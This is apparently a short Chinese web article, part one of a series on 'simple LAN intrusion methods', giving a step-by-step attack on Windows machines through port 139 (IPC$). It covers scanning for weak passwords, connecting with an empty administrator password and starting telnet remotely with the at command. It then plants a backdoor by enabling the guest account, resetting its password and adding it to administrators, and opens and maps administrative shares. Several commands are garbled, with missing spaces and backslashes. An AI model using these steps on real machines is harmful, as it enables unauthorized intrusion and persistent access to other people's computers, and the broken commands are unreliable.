爱华网简单的局域网入侵方法(一)
——139端口(IPC$)入侵
1、先用“NTscan变态扫描器”扫描局域网,使用WMI扫描端口139,得到一些弱口令用户的IP,用系统自带命令:{netuse \IPIPC$ "" /user:administrator},但是绝大部分情况下都会提示“发生系统错误53,找不到网络路径。”可以肯定对方机子上安装了防火墙,进不去了。
2、只有极个别能连上,提示“命令成功完成”,接下来建立连接:
nettime\192.168.0.1显示远程主机的当前时间,显示时间为05:00
at\192.168.0.1 05:00telnet用at命令启动远程主机的telnet服务
如果没成功,也可以这样操作我的电脑==>管理==>连接到另一台计算机==>输入IP==>服务和应用程序==>服务==>将telnet改为手动==>启动,就OK了。
telnet192.168.0.1telnet登录, 输入y
administrator输入的用户名,密码为空
3、设置后门
netuser查看用户,一般有:administrator,guest, HelpAssistant
net user guest/active:yes激活guest用户
net userguest***更改guest的密码为***
netlocalgroup administrators guest/add把guest的权限提升为管理员权限,为以后入侵留后门
4、设置共享
net shareE$设置E盘共享
net share c$/del关闭C盘共享
net use x: \ipc$映射远程主机c$盘到本地x盘
也可以使用远程监控软件(如:dameware)控制这台电脑。
5、用完后断开远程主机的连接
